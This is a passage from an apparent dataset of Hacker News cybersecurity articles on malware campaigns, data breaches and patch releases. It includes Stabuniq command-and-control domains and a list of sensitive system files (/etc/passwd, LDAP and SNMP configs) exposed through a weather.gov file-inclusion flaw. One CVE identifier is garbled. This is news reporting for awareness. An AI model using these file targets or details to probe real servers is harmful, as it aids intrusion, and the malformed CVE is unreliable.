damaging attack. According to researchers, roughly 40 IP addresses infected with the Stabuniq Trojan, 40% per cent belong to financial institutions who are mostly based in Chicago and New York. The malware appears to be spread by a phishing attack through spam e-mail containing a link to the address of a server hosting a Web exploit toolkit. Such toolkits are commonly used to silently install malware on Web users' computers by exploiting vulnerabilities in outdated browser plug-ins like Flash Player, Adobe Reader, or Java. These attacks can be very simple, such as a written email from a prince in Nigeria asking for bank account information. Once installed, it collects information including its computer name, IP address, operating system version and installed service packs, running processes and dumps that data to a command & control server located at: anatwriteromist.com bbcnews192.com belsaw920.com benhomelandefit.com midfielderguin.com prominentpirsa.com sovereutilizeignty.com yolanda911.com Recommended actions for readers, Use a firewall to block all incoming connections from the Internet to services that should not be publicly available. By default, you should deny all incoming connections and only allow services you explicitly want to offer to the outside world. Ensure that programs and users of the computer use the lowest level of privileges necessary to complete a task. When prompted for a root or UAC password, ensure that the program asking for administration-level access is a legitimate application. Turn off and remove unnecessary services and Enforce a password policy. Stay tuned to +The Hacker News . ",Malware Namecheap Accounts Compromised in Data Breach,https://thehackernews.com/2014/09/namecheap-accounts-compromised-in-data_2.html,"LA-based domain name registrar and hosting company Namecheap warned its customers on Monday that cybercriminals have begun accessing their accounts by using the list of credentials gathered from third-party websites. The Hosting company confirmed the security breach and informed that the hackers have compromised some of its customers' accounts, probably using the ""biggest-ever"" password theft via Russian Hackers that disclosed list of 1.2 billion usernames and passwords compiled by Russian CyberVor Gang. RUSSIAN GROUP BEHIND THE ATTACK - CYBERVOR The CyberVor Gang allegedly stolen a vast cache of compromised login credentials for ""1.2 billion"" accounts, belonging to over half a billion e-mail addresses, warned Hold Security, a Milwaukee-based security company that tracks stolen data on underground cybercriminal forums. The gang appears to have broken into at least 420,000 websites vulnerable to SQL injection attacks, among other techniques, in order to fetch majority of these credentials. GOOD NEWS - NAMECHEAP BECOME AWARE OF THE ATTACK SOON Namecheap said it had become aware of the ongoing attacks, thanks to the company's intrusion detection systems that alerted them to a ""much higher than normal load against our login system [using] username and password data gathered from third party sites that were trying to be used to try and gain access to Namecheap.com accounts."" The invaders were trying multiple times to log in to a number of accounts until they get the right combination and access. While most of their attempts were failed but some appear to be successful, prompting Namecheap to suspend some users' accounts in the fear that it may have been compromised as well as blocking over 30,000 IP addresses associated with the attack, as detailed in on the corporate blog of the hosting firm. FAKE BROWSER USED IN MASSIVE BREACH It is believed that the hackers behind the attack are using the stored usernames and passwords to simulate a web browser login through fake browser software. This software replicates the actual login procedure a customer would use if they are making use of Firefox, Safari, or Chrome browsers to access their Namecheap account. ""The hackers are going through their username/password list and trying each and every one to try and get into Namecheap user accounts. The vast majority of these login attempts have been unsuccessful as the data is incorrect or old and passwords have been changed,"" the company said in a blog post entitled, Urgent Security Warning. ""As a precaution, we are aggressively blocking the IP addresses that appear to be logging in with the stolen password data. We are also logging these IP addresses and will be exporting blocking rules across our network to completely eliminate access to any Namecheap system or service, as well as making this data available to law enforcement."" Namecheap believed that the hacking attack is linked to the Russian CyberVor gang and is not at all related to the recent data breaches such as the high-profile Target breach or the Adobe attack. HOW TO PROTECT YOURSELF ""Our early investigation shows that those users who use the same password for their Namecheap account that are used on other websites are the ones who are vulnerable,"" said Matt Russell, vice president of hosting company. Russell encourages Namecheap customers to enable two-factor authentication when they regain access to their Namecheap account. Two-factor authentication has been enabled at other web hosting companies as users look for ways to add an extra layer of security to their hosting and email accounts. ",Data_Breaches Dragonfly 2.0: Hacking Group Infiltrated European and US Power Facilities,https://thehackernews.com/2017/09/dragonfly-energy-hacking.html,"The notorious hacking group that has been in operation since at least 2011 has re-emerged and is still interested in targeting the United States and European companies in the energy sector. Yes, I am talking about the 'Dragonfly,' a well-resourced, Eastern European hacking group responsible for sophisticated cyber-espionage campaigns against the critical infrastructure of energy companies in different countries in past years. In 2014, we reported about the Dragonfly groups ability to mount sabotage operations against their targets—mainly petroleum pipeline operators, electricity generation firms and other Industrial Control Systems (ICS) equipment providers for the energy sector. Researchers from cyber security firm Symantec who discovered the previous campaign is now warning of a new campaign, which they dubbed Dragonfly 2.0, saying ""the group now potentially has the ability to sabotage or gain control of these systems should it decide to do so"" and has already gained unprecedented access to operational systems of Western energy firms. Here are the major highlights of the group activities outlined in the new report from Symantec: The hacking group has been active since late 2015 and reportedly using same tactics and tools that were used in earlier campaigns. The major objective of the Dragonfly 2.0 group is to collect intelligence and gain access to the networks of the targeted organization, eventually making the group capable of mounting sabotage operations when required. Dragonfly 2.0 majorly targeting the critical energy sectors in the U.S., Turkey, and Switzerland. Like previous Dragonfly campaigns, the hackers are using malicious email (containing very specific content related to the energy sector) attachments, watering hole attacks, and Trojanized software as an initial attack vector to gain access to a victim's network. The group is using a toolkit called Phishery (available on GitHub) to perform email-based attacks that host template injection attack to steal victim's credentials. Malware campaign involves multiple remote access Trojans masquerading as Flash updates called, Backdoor.Goodor, Backdoor.Dorshel and Trojan.Karagany.B, allowing attackers to provide remote access to the victim's machine. However, Symantec researchers did not find any evidence of the Dragonfly 2.0 group using any zero day vulnerabilities. Instead, the hacking group strategically uses publically available administration tools like PowerShell, PsExec, and Bitsadmin, making attribution more difficult. ""The Dragonfly 2.0 campaigns show how the attackers may be entering into a new phase, with recent campaigns potentially providing them with access to operational systems, access that could be used for more disruptive purposes in future,"" Symantec believes. Cyber attacks on energy grids are not a new thing. Energy companies in Ukraine targeted by hackers on two different occasions in late 2015 and late 2016, actually caused the power outage across several regions in Ukraine, causing a blackout for tens of thousands of citizens around midnight. Moreover, Nuclear facilities in the United States, including Wolf Creek Nuclear Operating Corporation, were targeted by a well-known Russian group back in July this year, but luckily there's no proof if the hackers were able to gain access to the operational systems or not. ",Cyber_Attack Hackers Turning to 'Exotic' Programming Languages for Malware Development,https://thehackernews.com/2021/07/hackers-turning-to-exotic-programming.html,"Threat actors are increasingly shifting to ""exotic"" programming languages such as Go, Rust, Nim, and Dlang that can better circumvent conventional security protections, evade analysis, and hamper reverse engineering efforts. ""Malware authors are known for their ability to adapt and modify their skills and behaviors to take advantage of newer technologies,"" said Eric Milam, Vice President of threat research at BlackBerry. ""That tactic has multiple benefits from the development cycle and inherent lack of coverage from protective products."" On the one hand, languages like Rust are more secure as they offer guarantees like memory-safe programming, but they can also be a double-edged sword when malware engineers abuse the same features designed to offer increased safeguards to their advantage, thereby making malware less susceptible to exploitation and thwart attempts to activate a kill-switch and render them powerless. Noting that binaries written in these languages can appear more complex, convoluted, and tedious when disassembled, the researchers said the pivot adds additional layers of obfuscation, simply by virtue of them being relatively new, leading to a scenario where older malware developed using traditional languages like C++ and C# are being actively retooled with droppers and loaders written in uncommon alternatives to evade detection by endpoint security systems. Earlier this year, enterprise security firm Proofpoint discovered new malware written in Nim (NimzaLoader) and Rust (RustyBuer) that it said were being used in active campaigns to distribute and deploy Cobalt Strike and ransomware strains via social engineering campaigns. In a similar vein, CrowdStrike last month observed a ransomware sample that borrowed implementations from previous HelloKitty and FiveHands variants, while using a Golang packer to encrypt its main C++-based payload. BlackBerry's latest findings show that these artifacts are part of an uptick in threat actors adopting Dlang, Go, Nim, and Rust to rewrite existing families or create tools for new malware sets over the past decade - Dlang - DShell, Vovalex, OutCrypt, RemcosRAT Go - ElectroRAT, EKANS (aka Snake), Zebrocy, WellMess, ChaChi Nim - NimzaLoader, Zebrocy, DeroHE, Nim-based Cobalt Strike loaders Rust - Convuster Adware, RustyBuer, TeleBots Downloader and Backdoor, NanoCore Dropper, PyOxidizer ""Programs written using the same malicious techniques but in a new language are not usually detected at the same rate as those written in a more mature language,"" BlackBerry researchers concluded. ""The loaders, droppers and wrappers [...] are in many cases simply altering the first stage of the infection process rather than changing the core components of the campaign. This is the latest in threat actors moving the line just outside of the range of security software in a way that might not trigger on later stages of the original campaign."" ",Malware PayPal Subsidiary Data Breach Hits Up to 1.6 Million Customers,https://thehackernews.com/2017/12/paypal-tio-data-breach.html,"Global e-commerce business PayPal has disclosed a data breach that may have compromised personally identifiable information for roughly 1.6 million customers at a payment processing company PayPal acquired earlier this year. PayPal Holdings Inc. said Friday that a review of its recently acquired company TIO Networks showed evidence of unauthorized access to the company's network, including some confidential parts where the personal information of TIO's customers and customers of TIO billers stored. Acquired by PayPal for US$233 Million in July 2017, TIO Network is a cloud-based multi-channel bill payment processor and receivables management provider that serves the largest telecom, wireless, cable and utility bill issuers in North America. PayPal did not clear when or how the data breach incident took place, neither it revealed details about the types of information being stolen by the hackers, but the company did confirm that its platform and systems were not affected by the incident. ""The PayPal platform is not impacted in any way, as the TIO systems are completely separate from the PayPal network, and PayPal's customers' data remains secure,"" PayPal said in its press release [PDF]. The data breach in TIO Networks was discovered as part of an ongoing investigation for identifying security vulnerabilities in the payment processing platform. As soon as PayPal identified an unauthorized access to the TIO's network, PayPal took action by ""initiating an internal investigation of TIO and bringing in additional third-party cybersecurity expertise to review TIO's bill payment platform,"" PayPal press release [PDF] reads. The company has begun working with companies it services to notify potentially affected customers. Besides notifying, the company is also working with a consumer credit reporting agency, Experian, to provide free credit monitoring memberships for fraud and identity theft to those who are affected by the breach. To protect its customers, TIO has also suspended its services until a full-scale investigation into the incident is completed. ""At this point, TIO cannot provide a timeline for restoring bill pay services, and continues to recommend that you contact your biller to identify alternative ways to pay your bills,"" TIO's Consumer FAQ reads. ""We sincerely apologize for any inconvenience caused to you by the disruption of TIO's service."" Since the investigation is ongoing, PayPal will communicate with TIO customers and merchant partners directly as soon as the company has more details on the incident. Also, the affected customers will be directly contacted by the company. ",Data_Breaches Carberp botnet developers team arrested in Russia,https://thehackernews.com/2013/04/carberp-botnet-developers-team-arrested.html,"Cybercriminals, underground hacking communities, hacker's market and Exploit packs.... Russian cyberspace is well known for such crazy hacking stuff. Recently, the original Carberp botnet developer ring that stole millions from bank accounts worldwide has been arrested. According to a report from Russian newspaper, a group of 20 people who served as its malware development team, were arrested by the Sluzhba Bezpeky Ukrayiny and the Federalnaya sluzhba bezopasnosti Rossiyskoy Federatsii (federal security service of Russia, FSB) in cities around Ukraine. Over $250 million has been stolen by the members of the botnet ring, which had roughly 20 members aged between 25 and 30. ""Our experts did an enormous amount of work, which resulted in identifying the head of this criminal group, the owner and operator of a specialized banking botnet, identifying the control servers, and identifying the directing of traffic from popular websites in order to spread malware infection,"" said Ilya Sachkov, chief executive of Group-IB, As recently as December, Carpberp fetched $40,000 per kit. Carberp malware was used as part of the ""Eurograbber"" botnet system uncovered late last year that went after both PCs and smartphones in its financial fraud campaign. Like other banking Trojans, Carberp could intercept information which could be used to break into online banking accounts and transfer funds. Its mobile component allows criminals to steal mobile transaction authentication numbers (mTANs) sent by banks to authorize specific transactions. Each of them worked remotely, and were responsible for the development of one part of the malware, officials said. Carberp was constantly modified and updated to ensure it would evade antivirus detection. If found guilty, under current law, they could face up to five years in prison. ",Malware Shamoon Malware : Permanently wiping data from Energy Industry Computers,https://thehackernews.com/2012/08/shamoon-malware-permanently-wiping-data.html,"Malware researchers have uncovered an attack targeting an organization in the energy industry that attempts to wreak havoc by permanently wiping data from an infected computer's hard drive and rendering the machine unusable. Symantec would not name the victimized firm, and so far has seen the attack only in this one organization. W32.Disttrack is a new threat that is being used in specific targeted attacks against at least one organization in the energy sector. It is a destructive malware that corrupts files on a compromised computer and overwrites the MBR (Master Boot Record) in an effort to render a computer unusable. W32.Disttrack consists of several components: Dropper—the main component and source of the original infection. It drops a number of other modules. Wiper—this module is responsible for the destructive functionality of the threat. Reporter—this module is responsible for reporting infection information back to the attacker. ""Ten years ago we used to see purely malicious threats like this,"" muses Symantec researcher Liam O Murchu. The likely scenario for the victim would be an experience in which the computer is booting up, but all the files get erased, and the computer collapses into a non-bootable state. Saudi Arabia-based Saudi Aramco, the world's largest crude exporter, was reportedly hit by a computer virus this week that entered its network through personal computers. Shamoon is unusual because it goes to great lengths to ensure destroyed data can never be recovered, something that is rarely seen in targeted attacks. It has self-propagation capabilities that allow it to spread from computer to computer using shared network disks. It overwrites disks with a small portion of a JPEG image found on the Internet. ",Malware Sensitive server info leaked from weather.gov Vulnerability,https://thehackernews.com/2012/10/sensitive-server-info-leaked-from.html,"Kosova Hacker's Security group today release very sensitive server info of ""The National Weather Service"", which was gathered due to a ""Local file inclusion"" Vulnerability in weather.gov . By definition, Local File Inclusion (also known as LFI) is the process of including files on a server through the web browser. This vulnerability occurs when a page include is not properly sanitized, and allows directory traversal characters to be injected. Hackers publish complete data in a pastebin file uploaded today, but the hack was performed two day back and in meantime, server administrator fix the vulnerability. We just talk with the hacking crew to know the reason of hack and data exposure, one of them explain that they are against US policies, who are targeting muslim countries. ""They hack our nuclear plants using STUXNET and FLAME like malwares , they are bombing us 24*7, we can't sit silent - hack to payback them"" Hacker expose data from sensitive files : /etc/passwd /etc/groups /etc/hosts /etc/samba/dhcp.conf /etc/apache2/conf.d /proc/version /proc/cpuinfo /proc/self/mounts /proc/self/status /proc/self/stat /etc/security/access.conf /etc/ldap/ldap.conf /etc/cups/printers.conf /etc/gconf /etc/syslog.conf /etc/snmp/snmpd.conf /share/snmp/snmpd.conf /etc/ca-certificates.conf /etc/mysql/conf.d /etc/security/limits.conf /etc/security/group.conf For a server administrator this information is very sensitive, whereas for a Hacker this information could be too much juicy like members of /bin/bash shell are root, cmccan, darnold, mstrydom, nscanner who can login via console. That means, hackers can try to brute force there usernames against password list to compromise whole server. In their note hackers wrote, ""Months ago in the American media write that as Americans have in the field control cybernetics Muslim country servers. We as an organization have taken the order we receive checks in some American servers as it is one of to Weather.Gov. We do not want Americans to take control servers Muslim country .We have infected computers with botnets very few organizations that deal with anti-Muslim purposes. We will soon publish the many other things the U.S. government and we will never stop year after year . This is our mission ."" UPDATE: A 'The Hacker News' Reader - Chirag Singh just reported another vulnerability in same site. This time its Cross site scripting, Proof of concept is as shown below in screenshot. ",Vulnerability This July Microsoft Plans to Patch Windows and Internet Explorer Vulnerabilities,https://thehackernews.com/2014/07/this-july-microsoft-plans-to-patch.html,"Beginning of the new month, Get Ready for Microsoft Patch Tuesday! Microsoft has released its Advance Notification for the month of July 2014 Patch Tuesday releasing six security Bulletins, which will address a total of six vulnerabilities in its products, out of which two are marked critical, one is rated moderate and rest are important in severity. All six vulnerabilities are important for you to patch, as the flaws are affecting various Microsoft software, including Microsoft Windows, Microsoft Server Software and Internet Explorer, with the critical ones targeting Internet Explorer and Windows. Microsoft is also providing an update for the ""Microsoft Service Bus for Windows Server"" which is rated moderate for a Denial of Service (DoS) flaw. ""At first glance it looks like Microsoft may be taking it easy on us this month, which would be nice since we will be coming off a long holiday weekend here in the U.S."" Chris Goettl from IT Security firm Shavlik told in an email to The Hacker News. ""Microsoft has announced six bulletins for July: two critical, three important and one moderate. The critical updates could allow for remote code execution, which would prevent attackers from accessing your data remotely. The important updates are all elevation of privilege attacks and the moderate is a denial-of-service attack update."" ONCE AGAIN, INTERNET EXPLORER As usually, one of the two Critical security bulletins is related to Internet Explorer, which will address a Remote Code Execution vulnerability, affecting all versions of Internet Explorer including IE11 in Windows 8.1. The second Critical security bulletin impacts almost every supported version of the Windows operating system, including Windows 8.1. Windows RT, Server 2008 and server 2012 R2 all have critical fixes that may require a restarting. Bulletin 3, 4, and 5 are all elevation of privilege vulnerabilities in Windows and affect all versions of Windows, and therefore, are important to patch. The final bulletin is rated 'moderate' and is a Denial of Service vulnerability, which impacts Microsoft Service Bus for Windows Server. ""This month we are primarily looking at OS updates, although there is also an Internet Explorer update. Considering last month there was a cumulative security update for IE that affects all currently supported versions of IE on all currently supported versions of Windows, this month there will likely not be a cumulative update."" Chris Goettl said. PATCH TUESDAY, 8TH JULY Full details of the vulnerabilities will be released on Tuesday, July 8 at 10am PST by Microsoft, along with a guide for administrators. 'One thing to watch out for will be the many exceptions we saw last month. Many of the updates we saw in June require other updates to be in place, depending on the platform it applied to. For those running Windows 8.1 or Server 2012 R2, they need to be prepared for more of these updates to require Update 1 before they can apply them. Microsoft had stated they would delay a hard enforcement until August, but more and more of the patches had variations that required Update 1', Chris said. Microsoft will not release any security update for its older version of Windows XP, as it stopped supporting Windows XP Operating System. So, if you are still running this older version of operating system on your PCs, we again advise you to move on to other operating system in order to receive updates and secure yourself from upcoming threats. ",Vulnerability Experts Shed Light On Distinctive Tactics Used by Hades Ransomware,https://thehackernews.com/2021/06/experts-shed-light-on-distinctive.html,"Cybersecurity researchers on Tuesday disclosed ""distinctive"" tactics, techniques, and procedures (TTPs) adopted by operators of Hades ransomware that set it apart from the rest of the pack, attributing it to a financially motivated threat group called GOLD WINTER. ""In many ways, the GOLD WINTER threat group is a typical post-intrusion ransomware threat group that pursues high-value targets to maximize how much money it can extort from its victims,"" researchers from SecureWorks Counter Threat Unit (CTU) said in an analysis shared with The Hacker News. ""However, GOLD WINTER's operations have quirks that distinguish it from other groups."" The findings come from a study of incident response efforts the Atlanta-based cybersecurity firm engaged in the first quarter of 2021. Since first emerging in the threat landscape in December 2020, Hades has been classified as INDRIK SPIDER's successor to WastedLocker ransomware with ""additional code obfuscation and minor feature changes,"" per Crowdstrike. INDRIK SPIDER, also known as GOLD DRAKE and Evil Corp, is a sophisticated eCrime group infamous for operating a banking trojan called Dridex as well as distributing BitPaymer ransomware between 2017 and 2020. The WastedLocker-derived ransomware strain has been found to have impacted at least three victims as of late March 2021, according to research by Accenture's Cyber Investigation and Forensic Response (CIFR) and Cyber Threat Intelligence (ACTI) teams, including a U.S. transportation and logistics organization, a U.S. consumer products organization, and a global manufacturing organization. Trucking giant Forward Air was revealed to be a target back in December 2020. Then a subsequent analysis published by Awake Security raised the possibility that an advanced threat actor may be operating under the guise of Hades, citing a Hafnium domain that was identified as an indicator of compromise within the timeline of the Hades attack. Hafnium is the name assigned by Microsoft to a Chinese nation-state actor that the company has said is behind the ProxyLogon attacks on vulnerable Exchange Servers earlier this year. Stating that the threat group uses TTPs not associated with other ransomware operators, Secureworks said the absence of Hades from underground forums and marketplaces could mean that Hades is operated as private ransomware rather than ransomware-as-a-service (RaaS). GOLD WINTER targets virtual private networks and remote desktop protocols to gain an initial foothold and maintain access to victim environments, using it to achieve persistence via tools such as Cobalt Strike. In one instance, the adversary disguised the Cobalt Strike executable as a CorelDRAW graphics editor application to mask the true nature of the file, the researchers said. In a second case, Hades was found to leverage SocGholish malware — usually associated with the GOLD DRAKE group — as an initial access vector. SocGholish refers to a drive-by attack in which a user is tricked into visiting an infected website using social engineering themes that impersonate browser updates to trigger a malicious download without user intervention. Interestingly, in what appears to be an attempt to mislead attribution or ""pay homage to admired ransomware families,"" Hades has exhibited a pattern of duplicating ransom notes from other rival groups like REvil and Conti. Another novel technique involves the use of Tox instant messaging service for communications, not to mention the use of Tor-based websites tailored to each victim as opposed to utilizing a centralized leak site to expose data stolen from its victims. ""Each website includes a victim-specific Tox chat ID for communications,"" the researchers said. ""Ransomware groups are typically opportunistic: they target any organization that could be susceptible to extortion and will likely pay the ransom,"" the researchers noted. ""However, GOLD WINTER's attacks on large North America-based manufacturers indicates that the group is a 'big game hunter' that specifically seeks high-value targets."" ",Malware Cybercriminals Using Telegram Messenger to Control ToxicEye Malware,https://thehackernews.com/2021/04/cybercriminals-using-telegram-messenger.html,"Adversaries are increasingly abusing Telegram as a ""command-and-control"" system to distribute malware into organizations that could then be used to capture sensitive information from targeted systems. ""Even when Telegram is not installed or being used, the system allows hackers to send malicious commands and operations remotely via the instant messaging app,"" said researchers from cybersecurity firm Check Point, who have identified no fewer than 130 attacks over the past three months that make use of a new multi-functional remote access trojan (RAT) called ""ToxicEye."" The use of Telegram for facilitating malicious activities is not new. In September 2019, an information stealer dubbed Masad Stealer was found to plunder information and cryptocurrency wallet data from infected computers using Telegram as an exfiltration channel. Then last year, Magecart groups embraced the same tactic to send stolen payment details from compromised websites back to the attackers. The strategy also pays off in a number of ways. For a start, Telegram is not only not blocked by enterprise antivirus engines, the messaging app also allows attackers to remain anonymous, given the registration process requires only a mobile number, thereby giving them access to infected devices from virtually any location across the world. The latest campaign spotted by Check Point is no different. Spread via phishing emails embedded with a malicious Windows executable file, ToxicEye uses Telegram to communicate with the command-and-control (C2) server and upload data to it. The malware also sports a range of exploits that allows it to steal data, transfer and delete files, terminate processes, deploy a keylogger, hijack the computer's microphone and camera to record audio and video, and even encrypt files for a ransom. Specifically, the attack chain commences with the creation of a Telegram bot by the attacker, which is then embedded into the RAT's configuration file, before compiling it into an executable (e.g. ""paypal checker by saint.exe""). This .EXE file is then injected into a decoy Word document (""solution.doc"") that, when opened, downloads and runs the Telegram RAT (""C:\Users\ToxicEye\rat.exe""). ""We have discovered a growing trend where malware authors are using the Telegram platform as an out-of-the-box command-and-control system for malware distribution into organizations,"" Check Point R&D Group Manager Idan Sharabi said. ""We believe attackers are leveraging the fact that Telegram is used and allowed in almost all organizations, utilizing this system to perform cyber attacks, which can bypass security restrictions."" ",Malware Firmware vulnerability allows man-in-the-middle attack using SD Memory cards,https://thehackernews.com/2014/01/firmware-vulnerability-allows-man-in.html,"How is it possible to exploit SD Card, USB stick and other mobile devices for hacking? Another interesting hack was presented at the Chaos Computer Congress (30C3), in Hamburg, Germany. The researchers demonstrated how it is possible to hack the microcontroller inside every SD and MicroSD flash cards that allow arbitrary code execution and can be used to perform a man in the middle attack. The Hardware Hackers Andrew ""bunnie"" Huang and Sean ""xobs"" described the exploitation method on their blog post,""it also enables the possibility for hardware enthusiasts to gain access to a very cheap and ubiquitous source of microcontrollers."" It seems that to reduce SD cards price and increase their storage capability, engineers have to consider a form of internal entropy that could affect data integrity on every Flash drive. Almost every NAND flash memory is affected by defects and presents problems like electron leakage between adjacent cells. ""Flash memory is really cheap. So cheap, in fact, that it's too good to be true. In reality, all flash memory is riddled with defects — without exception. The illusion of a contiguous, reliable storage media is crafted through sophisticated error correction and bad block management functions. This is the result of a constant arms race between the engineers and mother nature; with every fabrication process shrinks, memory becomes cheaper but more unreliable. Likewise, with every generation, the engineers come up with more sophisticated and complicated algorithms to compensate for mother nature's propensity for entropy and randomness at the atomic scale."" wrote Huang. Manufacturers have a sophisticated software that can detect hardware issues, such as bad sectors, and correct them through firmware. Hackers could hack into these flash-based storage devices using firmware vulnerability, allowing them to install malware. The firmware on the SD cards can be updated, but according the Huang revelations most manufacturers leave this update functionality unsecured. During the presentation, they reverse-engineered the instruction set of a particular microcontroller to inspect firmware loading mechanism. The attackers suitably modifying the firmware could hack any device that uses the compromised SD card (e.g. A mobile device, Wi-Fi equipped camera), the flash memory will appear to be operating normally while hacking the hoisting equipment. The SD card could make a copy of the contents in a hidden memory area or it could run malicious code while idle avoiding detection mechanisms. When we speak about USB hacking or SD Card is hacking we must consider that we are approaching the hacking on a large-scale due the wide diffusion of these components. Microcontrollers cost as little as 15¢ each in quantity, they are everywhere and every device that use them could be hacked. Another consideration that must be done is that Governments and high profile hackers could be very interested in this type of attack for both cyber espionage and sabotage, arrange a countermeasure against those types of threat it is very hard. A curiosity for the ""hackers inside""... These cards could be reprogrammed to become Arduino open source microcontroller and memory systems. ""An Arduino, with its 8-bit 16 MHz microcontroller, will set you back around $20. A MicroSD card with several gigabytes of memory and a microcontroller with several times the performance could be purchased for a fraction of the price,"" he writes. So, in short, destroy your SD cards if you have any dirty info on them and keep your eyes peeled for ultra-small, ultra-fast Arduino hacks. Look closely at the presentation... and distrustful of SD cards from now on. ",Malware FinFisher spyware found running on computers all over the world,https://thehackernews.com/2012/08/finfisher-spyware-found-running-on.html,"FinFisher, a software application used by law enforcement agencies for surveillance, appears to be far more widespred than originally thought.Sold by British company Gamma Internationl Gmbh, FinFisher secretly monitors computers by turning on webcams, recording everything the user types with a keylogger, and monitoring Skype calls. It can also bypass popular antivirus products, communicate covertly with remote servers, record emails, chats, and VOIP calls, and harvesting data from the hard drive. On Wednesday, computer security company Rapid7 researcher Claudio Guarnieri shared new details of the workings of FinFisher, a piece of malware sold by UK contractor Gamma Group to government agencies. He found FinFisher servers at work in Australia, Czech Republic, United Arab Emirates, Ethiopia, Estonia, Indonesia, Latvia, Mongolia, Qatar, and the United States. Rapid7 has published the IP addresses and communication ""fingerprint"" of the command and control servers it has discovered. The information can be used in intrusion detection systems. ""If you can identify those networks actually communicating with those IPs, it most likely means some of the people on those networks are being spied on in some way,"" Guarnieri said. Muench, who is based in Munich, has said his company didn't sell FinFisher spyware to Bahrain. He said he's investigating whether the samples used against Bahraini activists were stolen demonstration copies or were sold via a third party. ",Vulnerability Microsoft patches Stuxnet and FREAK Vulnerabilities,https://thehackernews.com/2015/03/stuxnet-freak-windows-vulnerability.html,"Microsoft has come up with its most important Patch Tuesday for this year, addressing the recently disclosed critical the FREAK encryption-downgrade attack, and a separate five-year-old vulnerability leveraged by infamous Stuxnet malware to infect Windows operating system. Stuxnet malware, a sophisticated cyber-espionage malware allegedly developed by the US Intelligence and Israeli government together, was specially designed to sabotage the Iranian nuclear facilities a few years ago. First uncovered in 2010, Stuxnet targeted computers by exploiting vulnerabilities in Windows systems. Thankfully, Microsoft has issued a patch to protect its Windows machines that have been left vulnerable to Stuxnet and other similar attacks for the past five years. The fixes are included in MS15-020 which resolves Stuxnet issue. The company has also issued an update that patches the FREAK encryption vulnerability in its SSL/TSL implementation called Secure Channel (Schannel). The fixes for the vulnerability are included in MS15-031. As we have mentioned in our previous report, FREAK — short for Factoring attack on RSA-EXPORT Keys — was initially thought to be associated with Apple's Safari and Android's stock browsers, but it was found to affect Windows PCs as well. This decades-old FREAK vulnerability allows an attacker on your network to force the software using Schannel component such as Internet Explorer to use weak encryption over the web, so that they can easily decrypt the intercepted HTTPS connections. Among these two critical issues, the company has also released a bunch of other updates. Microsoft's March 2015 Patch Tuesday update bundles a total of 14 security-related updates for 43 vulnerabilities affecting Internet Explorer, VBscript, Text Services, Adobe Font Drivers, and Office. MS15-018 - A Cumulative Security Update, rated as 'critical', affects all supported versions of Internet Explorer and addresses a number of Memory Corruption vulnerabilities, two elevation of privilege vulnerabilities, and a VBscript memory corruption vulnerability. MS15-019 - This update addresses a scripting vulnerability in some older versions of Windows operating systems. The vulnerability doesn't affect Windows 7 and later desktop versions. MS15-021 - It addresses eight vulnerabilities in the Adobe Font Driver components for Windows and Windows Server exploitable through a malicious website or file. It is also rated 'critical' due to the possibility of remote code execution. MS15-022 - This update fixes three unknown flaws in Office document formats as well as multiple cross-site scripting (XSS) issues for SharePoint Server, and applies to all supported versions of Microsoft Office, as well as the server-based Office Web Apps and SharePoint Server products. MS15-023 - This bulletin, rated as 'important', addresses four vulnerabilities in the Windows Kernel-Mode driver allowing elevation of privilege and information disclosure attacks by launching a specially-crafted application. Rest of all, MS15-024, MS15-025, MS15-027, MS15-028, MS15-29 and MS15-30, are rated as 'important' and affected Windows and Windows Server. Microsoft is advising all its users and administrators to install the new updates as soon as possible. ",Vulnerability "More than 1,400 Financial institutions in 88 Countries targeted by Banking Trojan in 2013",https://thehackernews.com/2013/12/more-than-1400-financial-institutions.html,"As the year draws to a close, we have seen the number of emerging threats like advance phishing attacks from the Syrian Electronic Army, financial malware and exploit kits, Cryptolocker ransomware infections, massive Bitcoin theft, extensive privacy breach from NSA and many more. The financial malware's were the most popular threat this year. Money is always a perfect motivation for attackers and cyber criminals who are continually targeting financial institutions. On Tuesday, Antivirus firm Symantec has released a Threat report, called ""The State of Financial Trojans: 2013"", which revealed that over 1,400 financial institutions have been targeted and compromised millions of computers around the globe and the most targeted banks are in the US with 71.5% of all analyzed Trojans. Financial institutions have been fighting against malware for the last ten years to protect their customers and online transactions from threat. Over the time the attackers adapted to these countermeasures and sophisticated banking Trojans began to emerge. According to the report, the number of infections of the most common financial Trojans grew to 337 percent in the first nine months of 2013. Nearly 1,500 institutions in 88 countries were potential targets during 2013. The financial fraud marketplace is also increasingly organized and Cyber criminals are using advanced Trojans to commit large scale attacks. Attackers of all skill levels can enter the arena of financial fraud, as the underground marketplace is a service industry that provides an abundance of resources. Those who lack expertise can simply purchase what they need. For as little as $100, an attacker can avail of a leaked Zeus or Spyeye equipped with Web-injects. The modern financial Trojan is extremely flexible, supporting a range of functionality designed to facilitate fraudulent transactions across a variety of services. Two dominant attack strategies are: Focused attack: This approach suits attackers with limited resources but also scales well to larger operations. If the distribution is accurate and the target institution has a sizeable client base, a focused attack can provide an adequate supply of targets. Shylock, Bebloh and Tilon all use this approach exclusively. Broad strokes: In this attack strategy, Trojans are set to target large numbers of institutions. Tilon, Cridex, and Gameover adopt these tactics and Zeus also uses this approach in its default configuration. According to Symantec, the main reason for the surge is weak authentication practices: Unfortunately, in many situations, security implementations adopted by financial institutions are inadequate to defend against the modern financial Trojan. Institutions are starting to adopt strong security measures like chipTAN, but the adoption rate is slow. Institutions that persist with weaker security measures will continue to be exploited by attackers. They need to maintain constant vigilance, apply software updates, maintain an awareness of new threats and deploy complementary security solutions that can defend against evolving malware attacks. ",Malware New Java Exploits boosts BlackHole exploit kit,https://thehackernews.com/2012/04/new-java-exploits-boosts-blackhole.html,"New Java Exploits boosts BlackHole exploit kit A widely disseminated exploit kit popular with hackers has been updated to take advantage of a recently discovered Java vulnerability. Researchers at Microsoft reported last week that it had observed this vulnerability being exploited in the wild. The Java exploit allows attackers to bypass the Java Runtime Environment's sandbox platform to install malicious code remotely. The malicious Java applet is loaded from an obfuscated HTML file. The Java applet contains two Java class files one Java class file triggers the vulnerability and the other one is a loader class used for loading. Named CVE-20120-0507, the flaw essentially allows hackers to bypass the Java sandbox, which is a mechanism designed to blunt attacks from malicious code. For its part, the BlackHole exploit kit, available underground, allows users armed with only basic computer knowledge to set up malicious websites to target vulnerable computers through the web browser. Statistics from vulnerability management firm Rapid7 tell a similar story based on its analysis of the Java patching habits of Internet users. According to the company, the first month after a Java patch is released the fix is deployed by less than 10 percent. After two months, the number jumps to approximately 20 percent. The highest patch rate for Java last year was 38 percent, which represented the percentage who applied the Java Version 6 Update 26 within three months of its release. According to software giant 